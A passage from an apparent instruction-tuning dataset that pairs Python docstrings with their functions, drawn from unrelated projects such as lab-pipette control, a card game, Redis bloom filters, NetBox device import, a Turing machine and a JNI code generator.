ul_per_mm = self._key_map_pipette_functions(model, ul, 'aspirate') + millimeters = ul / ul_per_mm() + destination_mm = self._get_plunger_position('bottom') + millimeters + return round(destination_mm, 6) +[INST] Calculate axis position for a given liquid volume. +Translates the passed liquid volume to absolute coordinates +on the axis associated with this pipette. + +Calibration of the pipette motor's ul-to-mm conversion is required. [/INST] def _dispense_plunger_position(self, ul): + model = self.name + if self.ul_per_mm: + ul_per_mm = lambda: self.ul_per_mm + else: + ul_per_mm = self._key_map_pipette_functions(model, ul, 'dispense') + millimeters = ul / ul_per_mm() + destination_mm = self._get_plunger_position('bottom') + millimeters + return round(destination_mm, 6) +[INST] Returns the plunger percentage for a given volume. +We use this to calculate what actual position the plunger axis +needs to be at in order to achieve the correct volume of liquid.. 
[/INST] def _volume_percentage(self, volume): + if volume < 0: + raise RuntimeError( + "Volume must be a positive number, got {}.".format(volume)) + if volume > self.max_volume: + raise RuntimeError( + "{0}µl exceeds pipette's maximum volume ({1}ul).".format( + volume, self.max_volume)) + if volume < self.min_volume: + self.robot.add_warning( + "{0}µl is less than pipette's min_volume ({1}ul).".format( + volume, self.min_volume)) + return volume / self.max_volume +[INST] Draw cards from the deck, depending on how many are to be drawn.. [/INST] def draw_card(deck, draw_number): + draw_copy = deck[0:draw_number] + del deck[0:draw_number] + return draw_copy +[INST] Find the card in the player's hand.. [/INST] def find_card(hand, card): + try: + if hand.index(card): + return True + except ValueError: + return False +[INST] Discard the card into play.. [/INST] def play_card(hand, card_index, discard_pile): + copied_card = hand[card_index] + if not discard_pile: + del hand[card_index] + discard_pile.append(copied_card) + elif card_compare(hand[card_index], discard_pile[-1]): + del hand[card_index] + discard_pile.append(copied_card) +[INST] Do an action depending on the top of the discard pile.. [/INST] def do_action(hand, deck, discard_pile): + top_discard_card = discard_pile[-1] + if top_discard_card == "wild-draw-4": + print("\nThe draw 4 wildcard has been played. The game will automatically draw 4 cards for you.\n") + new_4_cards = ' '.join(deck[0:4]) + hand += draw_card(deck, 4) + print("The new cards are:", new_4_cards + "\n") + elif top_discard_card.endswith("draw-2"): + top_discard_card_color = top_discard_card.split("-")[0] + print("\nThe draw 2 card from the color", top_discard_card_color, "has been played. The game will \ +automatically draw 2 cards for you.\n") + new_2_cards = ' '.join(deck[0:2]) + hand += draw_card(deck, 2) + print("The new cards are", new_2_cards + "\n") +[INST] Refill deck from the discard pile if it runs out.. [/INST] def refill_deck(deck, discard_pile): + if deck: + return + else: + deck += random.sample(discard_pile.copy(), len(discard_pile)) + discard_pile.clear() +[INST] \This is the main function of the program. +This function will be called immediately at start of execution..
[/INST] def main(): + my_deck = make_deck() + players_hands = { + "User": [] + } + players_hands["Computer"] = [] + players_names = list(players_hands.keys()) + discard_pile = [] + for player in players_hands.keys(): + players_hands[player] = draw_card(my_deck, 7) + beginning = True + game_over = False + while not game_over: + for player in players_names: + refill_deck(my_deck, discard_pile) + curr_player_hand = players_hands[player] + print("It is", player + "'s", "turn\n") + if player == "User": + draw_limit = 1 + if beginning: + print("Drop a card to the discard pile to start.") + else: + print("Pick the right card to drop to the discard pile.") + if discard_pile: + print("Current play:", discard_pile[-1]) + for card in enumerate(curr_player_hand, start=1): + print(str(card[0]) + ":", card[1]) + repeat_process = True + while repeat_process: + print("Number of cards in deck:", len(my_deck)) + try: + selected_card = int(input("Select card (0 to draw, -1 to check hand and -2 to end turn): ")) + except ValueError: + continue + if selected_card <= len(curr_player_hand) and selected_card >= 1: + if not discard_pile or card_compare(curr_player_hand[selected_card-1], discard_pile[-1]): + play_card(curr_player_hand, selected_card-1, discard_pile) + do_action(curr_player_hand, my_deck, discard_pile) + print(player + "'s turn has ended.\n") + repeat_process = False + else: + print("Wrong card, try again\n") + elif selected_card == 0: + if draw_limit > 0: + curr_player_hand += draw_card(my_deck, 1) + print("New card has been added to your hand ({})\n".format(curr_player_hand[-1])) + draw_limit -= 1 + continue + else: + print("You can't draw anymore until your next turn!\n") + elif selected_card == -1: + print("It is", player + "'s turn") + if discard_pile: + print("Current play:", discard_pile[-1]) + for card in enumerate(curr_player_hand, start=1): + print(str(card[0]) + ":", card[1]) + continue + elif selected_card == -2: + print("\n" + player + "'s turn has ended\n") + repeat_process = False + else: + print("\nPlease pick a number that is shown at the screen.\n") + continue + else: + ai(player, curr_player_hand, my_deck, discard_pile) + if is_winner(player, curr_player_hand): + print(player, "has won the game!") + game_over = True + break +[INST] Update the i-th node value to x.. [/INST] def update(self, i, x): + i += self.N - 1 + self.node[i] = x + while i > 1: + i >>= 1 + self.node[i] = self.func(self.node[i << 1], self.node[i << 1 | 1]) +[INST] Compute semi-orthogonality error (for debugging purposes).. [/INST] def orth_error(self): + orth_error = 0 + for layer in [self.factor1, self.factor2]: + orth_error += layer.orth_error() + return orth_error +[INST] Check whether the context is symmetrical and whether the passed +context can be used for creating a convolution kernel with dil. [/INST] def check_valid_context(context: list) -> None: + assert len(context) == 2 or len(context) % 2 != 0, "Context length must be 2 or odd" + if len(context) == 2: + assert context[0] + context[1] == 0, "Context must be of type {-1, 1}" + else: + assert context[len(context) // 2] == 0, "The context contain 0 in the center" + if len(context) > 1: + delta = [context[i] - context[i - 1] for i in range(1, len(context))] + assert all(delta[0] == delta[i] for i in range(1, len(delta))), \ + "Intra context spacing must be equal!" +[INST] Check if all the dependencies required by this application are installed. 
[/INST] def check_app_dependencies(self, deps): + if not deps: + return True + for dep in [x.strip() for x in deps.split(',') if x != ""]: + try: + app = ONOSApp.objects.get(app_id=dep) + if not app.backend_code == 1: + return False + except IndexError: + return False + return True +[INST] Never acquire a ServiceInstance on the ONOS Service, +those are ONOS apps, simply return true. [/INST] def acquire_service_instance(self, subscriber_service_instance): + return True +[INST] In the case of the ONOS service there are no links between ServiceInstances and ONOSApps, +so alway return an empty list. [/INST] def validate_links(self, subscriber_service_instance): + return [] +[INST] A quick and dirty way to reset Redis for the demo.. [/INST] def reset_app(): + r_client = RedisConn().get_client() + current_keys = r_client.keys("*") + for key in current_keys: + r_client.delete(key) + return True +[INST] Keyword arguments: +bf -- the bloom filter +pw -- the password to add + +boolean indicating success + +AssertionError on None value args. [/INST] def add_password_bloom_filter(bf, pw): + return str(add_to_bloom_filter_format_result(bf, pw)) +[INST] Checks a list of grandma's passwords to see how many of her passwords were unique. +Keyword Arguments: +passwords -- a list of passwords +percent_error -- the error rate (default to .2 or 20%). [/INST] def check_passwords(passwords=GRANDMA_PASSWORDS, error_rate=.2): + r_client = RedisConn().get_client() + grandma_bloom_filter = "gbloom" + grandma_set = "gset" + r_client.delete(grandma_bloom_filter) + r_client.delete(grandma_set) + r_client.bf().create(grandma_bloom_filter, error_rate, 50) + set_unique_count = 0 + bf_unique_count = 0 + check_results = list() + for password in passwords: + unique_to_bf = is_unique_bloom_filter(grandma_bloom_filter, password) + add_bloom_filter(grandma_bloom_filter, password) + if unique_to_bf: + bf_unique_count += 1 + unique_to_set = is_unique_set(grandma_set, password) + add_set(grandma_set, password) + if unique_to_set: + set_unique_count += 1 + password_results = RESULTS(password, unique_to_bf, unique_to_set, bf_unique_count, set_unique_count) + check_results.append(str(password_results)) + return { + "unique_count_set": set_unique_count, + "unique_count_bf": bf_unique_count, + "total_count": len(passwords), + "check_results": check_results + } +[INST] Adds items to specified set and formats return as boolean. +Keyword arguments: +set_name -- the set name +item -- the item to add + +Boolean indicating success + +AssertionError on None value args. [/INST] def add_to_set_format_result(set_name, item): + result = add_set(set_name, item) + return result == ITEM_ADDED_SUCCESSFULLY_SET +[INST] Converts Redis results to boolean representing if item was unique (aka not found). +Keyword arguments: +set_name -- the set +item -- the item to check. [/INST] def is_unique_set(set_name, item): + result = is_in_set(set_name, item) + return result == ITEM_NOT_FOUND_IN_SET +[INST] Adds items to specified bloom filter and formats return as boolean. +Keyword arguments: +bloom_filter -- the bloom filter +item -- the item to add + +boolean indicating success + +AssertionError on None value args. [/INST] def add_to_bloom_filter_format_result(bloom_filter, item): + result = add_bloom_filter(bloom_filter, item) + return result == ITEM_ADDED_SUCCESSFULLY_BLOOM_FILTER +[INST] Checks for item in specified bloom filter. +Keyword arguments: +bloom_filter -- the bloom filter +item -- the item to check. 
[/INST] def is_in_bloom_filter(bloom_filter, item): + assert bloom_filter is not None + assert item is not None + r_client = RedisConn().get_client() + return r_client.bf().exists(bloom_filter, item) +[INST] Converts Redis results to boolean representing if item was unique (aka not found). +Keyword arguments: +bloom_filter -- the bloom filter +item -- the item to check. [/INST] def is_unique_bloom_filter(bloom_filter, item): + result = is_in_bloom_filter(bloom_filter, item) + return result == ITEM_NOT_FOUND_IN_BLOOM_FILTER +[INST] Prompts user for API keys, adds them in an .ini file stored in the same +location as that of the script. [/INST] def add_config(): + genius_key = input('Enter Genius key : ') + bing_key = input('Enter Bing key : ') + CONFIG['keys']['bing_key'] = bing_key + CONFIG['keys']['genius_key'] = genius_key + with open(config_path, 'w') as configfile: + CONFIG.write(configfile) +[INST] Prompts for song number from list of songs. [/INST] def prompt(youtube_list): + option = int(input('\nEnter song number > ')) + try: + song_url = list(youtube_list.values())[option - 1] + song_title = list(youtube_list.keys())[option - 1] + except IndexError: + log.log_error('Invalid Input') + exit() + system('clear') + print('Download Song: ') + print(song_title) + print('Y/n?') + confirm = input('>') + if confirm == '' or confirm.lower() == 'y': + pass + elif confirm.lower() == 'n': + exit() + else: + log.log_error('Invalid Input') + exit() + return song_url, song_title +[INST] Downloads song from youtube-dl. [/INST] def download_song(song_url, song_title): + outtmpl = song_title + '.%(ext)s' + ydl_opts = { + 'format': 'bestaudio/best', + 'outtmpl': outtmpl, + 'postprocessors': [{ + 'key': 'FFmpegExtractAudio', + 'preferredcodec': 'mp3', + 'preferredquality': '192', + }, + {'key': 'FFmpegMetadata'}, + ], + } + with youtube_dl.YoutubeDL(ydl_opts) as ydl: + info_dict = ydl.extract_info(song_url, download=True) +[INST] Improves file name by removing crap words. [/INST] def songname(song_name): + try: + song_name = splitext(song_name)[0] + except IndexError: + pass + chars_filter = "()[]{}-:_/=+\"\'" + words_filter = ('official', 'lyrics', 'audio', 'remixed', 'remix', 'video', + 'full', 'version', 'music', 'mp3', 'hd', 'hq', 'uploaded') + song_name = ''.join(map(lambda c: " " if c in chars_filter else c, song_name)) + song_name = re.sub('|'.join(re.escape(key) for key in words_filter), + "", song_name, flags=re.IGNORECASE) + song_name = re.sub(' +', ' ', song_name) + return song_name.strip() +[INST] Provides a score out of 10 that determines the +relevance of the search result. [/INST] def matching_details(song_name, song_title, artist): + match_name = difflib.SequenceMatcher(None, song_name, song_title).ratio() + match_title = difflib.SequenceMatcher(None, song_name, artist + song_title).ratio() + if max(match_name,match_title) >= 0.55: + return True, max(match_name,match_title) + else: + return False, (match_name + match_title) / 2 +[INST] Adds the album art to the song. 
[/INST] def add_albumart(albumart, song_title): + try: + img = urlopen(albumart) + except Exception: + log.log_error("* Could not add album art", indented=True) + return None + audio = EasyMP3(song_title, ID3=ID3) + try: + audio.add_tags() + except _util.error: + pass + audio.tags.add( + APIC( + encoding=3, + mime='image/png', + type=3, + desc='Cover', + data=img.read() + ) + ) + audio.save() + log.log("> Added album art") +[INST] Searches for '.mp3' files in directory (optionally recursive) +and checks whether they already contain album art and album name tags or not.. [/INST] def fix_music(file_name): + setup() + if not Py3: + file_name = file_name.encode('utf-8') + tags = File(file_name) + log.log(file_name) + log.log('> Adding metadata') + try: + artist, album, song_name, lyrics, match_bool, score = get_details_spotify( + file_name) + except Exception: + artist, album, song_name, lyrics, match_bool, score = get_details_letssingit( + file_name) + try: + log.log_indented('* Trying to extract album art from Google.com') + albumart = albumsearch.img_search_google(artist+' '+album) + except Exception: + log.log_indented('* Trying to extract album art from Bing.com') + albumart = albumsearch.img_search_bing(artist+' '+album) + if match_bool: + add_albumart(albumart, file_name) + add_details(file_name, song_name, artist, album, lyrics) + try: + rename(file_name, artist+' - '+song_name+'.mp3') + except Exception: + log.log_error("Couldn't rename file") + pass + else: + log.log_error( + "* Couldn't find appropriate details of your song", indented=True) + log.log("Match score: %s/10.0" % round(score * 10, 1)) + log.log(LOG_LINE_SEPERATOR) + log.log_success() +[INST] Provision the config context based on the json file present in the config-contexts folder. +Uses the json filename as config context name. Applies it to the roles leaf and spine. +Limitation: Do not update the Config context if the content of the json file change.. [/INST] def provision_config_context(): + for file in glob.glob('config-contexts/*.json'): + with open(file) as json_data: + ccdata = json.load(json_data) + ccname= os.path.basename(file).split(".")[0] + get_or_create(nb.extras.config_contexts, search='name', name=ccname, data= ccdata, roles=[role_leaf.id,role_spine.id]) +[INST] Converts dirty strings into something URL-friendly. +FYI - Ordering is important.. [/INST] def slugify(s): + s = s.lower() + for c in [' ', '-', '.', '/']: + s = s.replace(c, '_') + s = re.sub(r'\W', '', s) + s = s.replace('_', ' ') + s = re.sub(r'\s+', ' ', s) + s = s.strip() + s = s.replace(' ', '-') + return s +[INST] Uses ruamel.yaml to load YAML files.. [/INST] def load_yaml(yaml_file: str): + yf = Path(yaml_file) + if not yf.is_file(): + return None + with yf.open("r") as stream: + yaml = YAML(typ="safe") + return yaml.load(stream) +[INST] Runs multiple checks to see if the device type already exists in NetBox.. 
[/INST] def device_type_exists(device_type): + try: + print(f"Checking if {device_type['model']} exists") + _slug = slugify(device_type['model']) + if nb.dcim.device_types.filter(model=device_type['model']): + print(f"Found device_type dict {device_type['model']}") + return True + elif nb.dcim.device_types.get(model=device_type['model']): + print(f"Found device_type name {device_type['model']}") + return True + elif nb.dcim.device_types.get(slug=device_type['slug']): + print(f"Found device_type slug {device_type['slug']}") + return True + elif nb.dcim.device_types.get(slug=_slug): + print(f"Found device_type _slug {_slug}") + return True + else: + return False + except Exception as e: + raise DeviceTypeLookupError(f"Error for {device_type}: {e}") +[INST] Validates and modifies data before inserting in NetBox.. [/INST] def validate_device_data(device_type): + if not isinstance(device_type, dict): + raise DeviceTypeValidationError(f"Validation FAILED for {device_type}: \ + {type(device_type)} is not a dict") + man = device_type['manufacturer'] + man_id = get_or_create_manufacturer(man) + device_type['manufacturer'] = man_id + return device_type +[INST] Validates and verifies the device type before inserting in NetBox.. [/INST] def process_device_type(device_type): + device_type = validate_device_data(device_type) + does_exist = device_type_exists(device_type) + if does_exist is False: + print(f"Adding new device-type {device_type['model']}") + nb.dcim.device_types.create(device_type) + else: + print(f"Already a device_type: {device_type['model']}") + print(f"Checking for templates: {device_type['model']}") + process_templates(device_type) +[INST] Process a YAML file for importing to NetBox.. [/INST] def process_yaml(yml_file): + device_type = load_yaml(yml_file) + process_device_type(device_type) +[INST] Remove a host entry or specific options in a host entry.. [/INST] def remove(self, host, *options): + if len(options) == 0: + del self[host] + else: + entry = self.get(host) + entry.remove(*options) + if len(entry) == 0: + self.remove(host) +[INST] Save the configuration somewhere safe.. [/INST] def save(self, dest): + if (isinstance(dest, file)): + dest.write(str(self)) + elif isinstance(dest, str): + f = open(dest, "w") + f.write(str(self)) + f.close() + else: + raise TypeError("Argument is not a file or str") +[INST] Get the priority of this host entry. This is used for ordering in +the eventual ssh_config.. [/INST] def priority(self): + return self.__priority +[INST] Converts the SshConfigEntry to a dict.. [/INST] def to_dict(self): + l = {} + l.update(self.__options) + return l +[INST] Calculate the new state of the machine after a character. +Returns the transition object which contains a 3-tuple of: +The new state, the output letter and the direction to move on +the tape. [/INST] def calc(self, character): + return self.transitions[character] +[INST] Updates the tape to allow experimentation with the TM. [/INST] def new_tape(self, tape): + self._update_tape(tape) + self._update_current_state(self._start_state) + assert self._reset_loops >= 0 + self.MAX_LOOPS = self._reset_loops +[INST] Internal method for updating the tape. 
[/INST] def _update_tape(self, tape): + self.tape_position = 0 + if self.tape is not None: + self.tape.clear() + assert(len(self.tape) == 0) + if isinstance(tape, list): + self.tape = [str(c) for c in tape] + elif type(tape) is str: + self.tape = [c for c in tape] + elif tape is None: + self.tape = [] + else: + raise ValueError("Tape has to be a list of symbols or a String (or Nothing)") + self.tape.append(self.EMPTY_SYMBOL) +[INST] Internal method for updating the accept state +Generally it is advised that this is not changed once the +machine has begun. [/INST] def _update_accept_state(self, accept_state): + assert accept_state is not None + TuringMachine._test_state(accept_state) + self.accept_state = accept_state +[INST] Internal method for updating the reject state +Generally it is advised that this is not changed once the +machine has begun. [/INST] def _update_reject_state(self, reject_state): + TuringMachine._test_state(reject_state) + self.reject_state = reject_state +[INST] Internal method for updating the start state. +Can only be updated ONCE upon CREATION OF THE TM.. [/INST] def _update_start_state(self, start_state): + assert self._start_state is None + TuringMachine._test_state(start_state) + self._start_state = start_state +[INST] Compute the result after the next symbol. [/INST] def _read(self, symbol): + self.MAX_LOOPS = self.MAX_LOOPS - 1 + t = self.current_state.calc(symbol) + self._move_tape(t.output_letter, t.movement_direction) + self._update_current_state(t.new_state) +[INST] Checks if path is a directory.. [/INST] def is_directory(dir_path): + isdir = os.path.isdir(dir_path) + logger.debug("Path specified %s", dir_path) + return isdir +[INST] Generates files required to perform JNI registration. +Generates a srcjar containing a single class, GEN_JNI, that contains all +native method declarations. + +Optionally generates a header file that provides functions +(RegisterMainDexNatives and RegisterNonMainDexNatives) to perform +JNI registration.. [/INST] def _Generate(java_file_paths, + srcjar_path, + proxy_opts, + header_path=None, + namespace=''): + results = [] + with multiprocessing.Pool() as pool: + for d in pool.imap_unordered( + functools.partial(_DictForPath, use_proxy_hash=proxy_opts.use_hash), + java_file_paths): + if d: + results.append(d) + results.sort(key=lambda d: d['FULL_CLASS_NAME']) + combined_dict = {} + for key in MERGEABLE_KEYS: + combined_dict[key] = ''.join(d.get(key, '') for d in results) + if header_path: + combined_dict['HEADER_GUARD'] = \ + os.path.splitext(header_path)[0].replace('/', '_').upper() + '_' + combined_dict['NAMESPACE'] = namespace + header_content = CreateFromDict(combined_dict, proxy_opts.use_hash) + with build_utils.AtomicOutput(header_path, mode='w') as f: + f.write(header_content) + with build_utils.AtomicOutput(srcjar_path) as f: + with zipfile.ZipFile(f, 'w') as srcjar: + if proxy_opts.use_hash: + build_utils.AddToZipHermetic( + srcjar, + '%s.java' % jni_generator.ProxyHelpers.GetQualifiedClass(True), + data=CreateProxyJavaFromDict(combined_dict, proxy_opts)) + build_utils.AddToZipHermetic( + srcjar, + '%s.java' % jni_generator.ProxyHelpers.GetQualifiedClass(False), + data=CreateProxyJavaFromDict( + combined_dict, proxy_opts, forwarding=True)) + else: + build_utils.AddToZipHermetic( + srcjar, + '%s.java' % jni_generator.ProxyHelpers.GetQualifiedClass(False), + data=CreateProxyJavaFromDict(combined_dict, proxy_opts))
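A hedged, standalone sketch follows (not part of the original training pairs): it restates the tape-normalisation rule that _update_tape above implements — a list of symbols, a string, or None all become a list of one-character symbols terminated by the machine's empty symbol. The function name and the EMPTY_SYMBOL value are illustrative assumptions, since only the method body appears in this excerpt.

EMPTY_SYMBOL = "_"  # assumption: the class constant is not shown in this excerpt

def normalise_tape(tape):
    if isinstance(tape, list):
        cells = [str(c) for c in tape]
    elif isinstance(tape, str):
        cells = list(tape)
    elif tape is None:
        cells = []
    else:
        raise ValueError("Tape has to be a list of symbols or a String (or Nothing)")
    cells.append(EMPTY_SYMBOL)
    return cells

print(normalise_tape("101"))      # ['1', '0', '1', '_']
print(normalise_tape([1, 0, 1]))  # ['1', '0', '1', '_']
print(normalise_tape(None))       # ['_']

[INST] Add the content of the forward declaration to the dictionary..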
[/INST] def _AddForwardDeclaration(self): + template = string.Template("""\ +JNI_GENERATOR_EXPORT ${RETURN} ${STUB_NAME}( + JNIEnv* env, + ${PARAMS_IN_STUB}); +""") + forward_declaration = '' + for native in self.natives: + value = { + 'RETURN': jni_generator.JavaDataTypeToC(native.return_type), + 'STUB_NAME': self.helper.GetStubName(native), + 'PARAMS_IN_STUB': jni_generator.GetParamsInStub(native), + } + forward_declaration += template.substitute(value) + self._SetDictValue('FORWARD_DECLARATIONS', forward_declaration) +[INST] Add the body of the RegisterNativesImpl method to the dictionary.. [/INST] def _AddRegisterNativesCalls(self): + if len(self.non_proxy_natives) == 0: + return '' + template = string.Template("""\ + if (!${REGISTER_NAME}(env)) + return false; +""") + value = { + 'REGISTER_NAME': + jni_generator.GetRegistrationFunctionName(self.fully_qualified_class) + } + register_body = template.substitute(value) + if self.main_dex: + self._SetDictValue('REGISTER_MAIN_DEX_NATIVES', register_body) + else: + self._SetDictValue('REGISTER_NON_MAIN_DEX_NATIVES', register_body) +[INST] Returns the implementation of the array of native methods.. [/INST] def _AddJNINativeMethodsArrays(self): + template = string.Template("""\ +static const JNINativeMethod kMethods_${JAVA_CLASS}[] = { +${KMETHODS} +}; +""") + open_namespace = '' + close_namespace = '' + if self.namespace: + parts = self.namespace.split('::') + all_namespaces = ['namespace %s {' % ns for ns in parts] + open_namespace = '\n'.join(all_namespaces) + '\n' + all_namespaces = ['} // namespace %s' % ns for ns in parts] + all_namespaces.reverse() + close_namespace = '\n'.join(all_namespaces) + '\n\n' + body = self._SubstituteNativeMethods(template) + self._SetDictValue('JNI_NATIVE_METHOD_ARRAY', ''.join((open_namespace, body, + close_namespace))) +[INST] Returns KMethodString for wrapped native methods in all_classes. [/INST] def _AddProxyNativeMethodKStrings(self): + if self.main_dex: + key = 'PROXY_NATIVE_METHOD_ARRAY_MAIN_DEX' + else: + key = 'PROXY_NATIVE_METHOD_ARRAY' + proxy_k_strings = ('\n'.join( + self._GetKMethodArrayEntry(p) for p in self.proxy_natives)) + self._SetDictValue(key, proxy_k_strings) +[INST] Substitutes NAMESPACE, JAVA_CLASS and KMETHODS in the provided +template.. [/INST] def _SubstituteNativeMethods(self, template, sub_proxy=False): + ret = [] + all_classes = self.helper.GetUniqueClasses(self.natives) + all_classes[self.class_name] = self.fully_qualified_class + for clazz, full_clazz in all_classes.items(): + if not sub_proxy: + if clazz == jni_generator.ProxyHelpers.GetClass(self.use_proxy_hash): + continue + kmethods = self._GetKMethodsString(clazz) + namespace_str = '' + if self.namespace: + namespace_str = self.namespace + '::' + if kmethods: + values = { + 'NAMESPACE': namespace_str, + 'JAVA_CLASS': jni_generator.EscapeClassName(full_clazz), + 'KMETHODS': kmethods + } + ret += [template.substitute(values)] + if not ret: return '' + return '\n'.join(ret) +[INST] Returns the implementation of the array of native methods.. [/INST] def GetJNINativeMethodsString(self): + template = string.Template("""\ +static const JNINativeMethod kMethods_${JAVA_CLASS}[] = { +${KMETHODS} +}; +""") + return self._SubstituteNativeMethods(template) +[INST] Returns the code for RegisterNatives.. 
[/INST] def _AddRegisterNativesFunctions(self): + natives = self._GetRegisterNativesImplString() + if not natives: + return '' + template = string.Template("""\ +JNI_REGISTRATION_EXPORT bool ${REGISTER_NAME}(JNIEnv* env) { +${NATIVES}\ + return true; +} +""") + values = { + 'REGISTER_NAME': + jni_generator.GetRegistrationFunctionName(self.fully_qualified_class), + 'NATIVES': + natives + } + self._SetDictValue('JNI_NATIVE_METHOD', template.substitute(values)) +[INST] Returns the shared implementation for RegisterNatives.. [/INST] def _GetRegisterNativesImplString(self): + template = string.Template("""\ + const int kMethods_${JAVA_CLASS}Size = + base::size(${NAMESPACE}kMethods_${JAVA_CLASS}); + if (env->RegisterNatives( + ${JAVA_CLASS}_clazz(env), + ${NAMESPACE}kMethods_${JAVA_CLASS}, + kMethods_${JAVA_CLASS}Size) < 0) { + jni_generator::HandleRegistrationError(env, + ${JAVA_CLASS}_clazz(env), + __FILE__); + return false; + } +""") + if len(self.non_proxy_natives) != 0: + return self._SubstituteNativeMethods(template) + return '' +[INST] Applies tuple fields (name, value) to xml. +Both items must be not None to show in attribute list.. [/INST] def _open_tag(self, indent_lvl=0, **kwargs): + return self._sub( + self._crlf + "{i}<{name}".format(i=self._indent * indent_lvl, + name=self._tag_name) + + ''.join(' {name}="{val}"'.format(name=name, val=val) + for (name, val) in self._fields + if val is not None) + + '>', **kwargs) +[INST] Will add text or another (arbitrary complex) XmlBuilder as children of element.. [/INST] def innerText(self, child): + self._children.append(child) + return self +[INST] Recursively converts self and all children to xml.. [/INST] def dump(self, indent_lvl=0, **kwargs): + dumped_children = [] + for child in filter(None, self._children): + if isinstance(child, XmlBuilder): + dumped_children.append(child.dump(indent_lvl=(indent_lvl + 1), + **kwargs)) + else: + dumped_children.append("{child}".format(child=self._sub(child, + **kwargs))) + if self._tag_name: + return (self._open_tag(indent_lvl, **kwargs) + + ''.join(dumped_children) + + self._close_tag(indent_lvl, **kwargs)) + return ''.join(dumped_children) +[INST] Provided data (from plugins dictionary) and walking template, get all valid +items and convert it to jUnit xml representation. + +Function have sane defaults (depends on calee opinion).. 
[/INST] def plugins_to_xml(dict_data, + yaml_filename=None, + yaml_data=default_config.YAML_CONFIG, + dict_templates=['All'], + additional_fields='AdditionalFields', + ts_attr='HtmlTestSuiteAttr', + tc_attr='HtmlTestCaseAttr', + tc_elem='HtmlTestCaseElem'): + def _apply(inst, custom_dict=None, **kwargs): + applied_args = {} + if custom_dict: + for k, v in custom_dict.items(): + applied_args[k] = getattr(inst, v) + for k, v in kwargs.items(): + applied_args[k] = getattr(inst, v) + return applied_args + if yaml_filename: + with open(yaml_filename) as f: + C = yaml.safe_load(f) + else: + C = yaml.safe_load(yaml_data) + results = {} + for template in dict_templates: + results[template] = rows.create(data=dict_data, + template=C[template], + additional_fields=C[additional_fields]) + ts_data = {} + for res in results.keys(): + ts_data[res] = collections.defaultdict(list) + ts_res = ts_data[res] + for row in results[res]: + ts_res[row.Node].append(row) + junit_xml = XmlBuilder() + for template_name, ts in ts_data.items(): + with junit_xml.testsuites as html_tss: + html_tss(name=template_name) + for _node, tcs in ts.items(): + with html_tss.testsuite as html_ts: + first = tcs[0] if tcs else None + if first: + html_ts(custom_dict=_apply(first, + custom_dict=C[ts_attr])) + for tc in tcs: + html_tc = html_ts.testcase( + custom_dict=_apply(tc, custom_dict=C[tc_attr])) + if tc.CaseStatus: + distinguisher = tc.CaseStatus + else: + distinguisher = tc.PluginStatus + if not tc.CaseName: + html_tc.name = tc.Plugin + if distinguisher == 'ERROR': + if tc.MsgError: + html_tc.error(message=escape( + list_to_string(tc.MsgError), quote=1)) + else: + html_tc.error() + elif distinguisher == 'WARN': + out = html_tc.__getattr__('system-out') + if tc.MsgWarn: + out.__setattr__('message', escape( + list_to_string(tc.MsgWarn), quote=1)) + return junit_xml.dump() +[INST] Stop all plugins +Wait until they are stopped if blocking=True. [/INST] def stop(self, blocking=True): + self.stopping = True + for plugin in self.plugins.values(): + if plugin.current_run: + plugin.current_run.stop() + plugin.current_run.terminate() + if blocking: + plugins_left = self.plugins.keys() + plugins_left_cnt = len(plugins_left) + while plugins_left: + plugins_left = [] + for name, plugin in self.plugins.items(): + if not plugin.current_run: + continue + if plugin.current_run.is_alive(): + plugins_left.append(name) + else: + plugin.current_run.join() + if plugins_left: + if len(plugins_left) != plugins_left_cnt: + lg.info("Waiting for %s plugins to shutdown: %s" % (len(plugins_left), ','.join(plugins_left))) + plugins_left_cnt = len(plugins_left) + time.sleep(0.5) +[INST] Add process and force plugin run. [/INST] def add_process(self, plugins=None, filter=None): + plugins_list = [] + if plugins: + for plugin in plugins: + plugins_list.append(self.get_plugin(plugin)) + if filter: + plugins_list.extend(self.get_plugins(filter)) + if len(plugins_list) == 0: + raise NoPluginsFound + process = { + 'plugins' : plugins_list, + } + plugins_name = [] + for p in plugins_list: + plugins_name.append(p.name) + lg.info("Forcing run of %d plugins: %s" % (len(plugins_list), ', '.join(plugins_name))) + self.processes.append(process) + id = len(self.processes)-1 + for plugin in plugins_list: + plugin.forced = True + plugin.forced_result = None + plugin.run() + return id +[INST] Start run of plugins configured as such. 
[/INST] def run_plugins_with_interval(self): + for plugin in self.plugins.values(): + if not plugin.params['Interval']: + continue + plugin.run() +[INST] Join zombie workers of interval-triggered runs +The results will be picked by REST server forked ends of the queues. [/INST] def join_timed_plugin_workers(self): + for plugin in self.plugins.values(): + if not plugin.params['Interval']: + continue + if plugin.current_run: + plugin.current_run.join() + plugin.current_run = None +[INST] Validate configuration +Raise InvalidConfiguration exception if invalid. [/INST] def validate(self): + if self.params['Timeout'] <= 0: + raise InvalidConfiguration("Timeout parameter can't be 0") + if not self.params['Command'] and not self.params['Module']: + raise InvalidConfiguration("Command or Module parameter has to be set") + if self.params['Command'] and self.params['Module']: + raise InvalidConfiguration("Command and Module parameters cannot be set together") + if not self.params['Command'] and self.params['Parser']: + raise InvalidConfiguration("Parser can be used only with Command parameter") +[INST] Run process +Check if plugin should be run and execute it. [/INST] def run(self): + if self.current_run: + if self.current_run.is_alive(): + return + self.current_run.join() + if self.forced: + self.current_run = PluginWorker(self.name, self.queue, self.params, + self.forced) + self.current_run.start() + elif self.params['Interval']: + if datetime.datetime.now() >= self.next_run: + self.current_run = PluginWorker(self.name, self.queue, + self.params) + self.current_run.start() + self.schedule_run() +[INST] Schedule next plugin run +Accept datetime object as time parameter or set +current time if now parameter is True. [/INST] def schedule_run(self, time=None, now=False): + if time: + if isinstance(time, datetime.datetime): + self.next_run = time + else: + raise InvalidArgument( + 'Parameter time has to be an instance of datetime object') + elif now: + self.next_run = datetime.datetime.now() + elif self.params['Interval']: + self.next_run = ( + datetime.datetime.now() + + datetime.timedelta(seconds=self.params['Interval'])) +[INST] Run system command and parse output. 
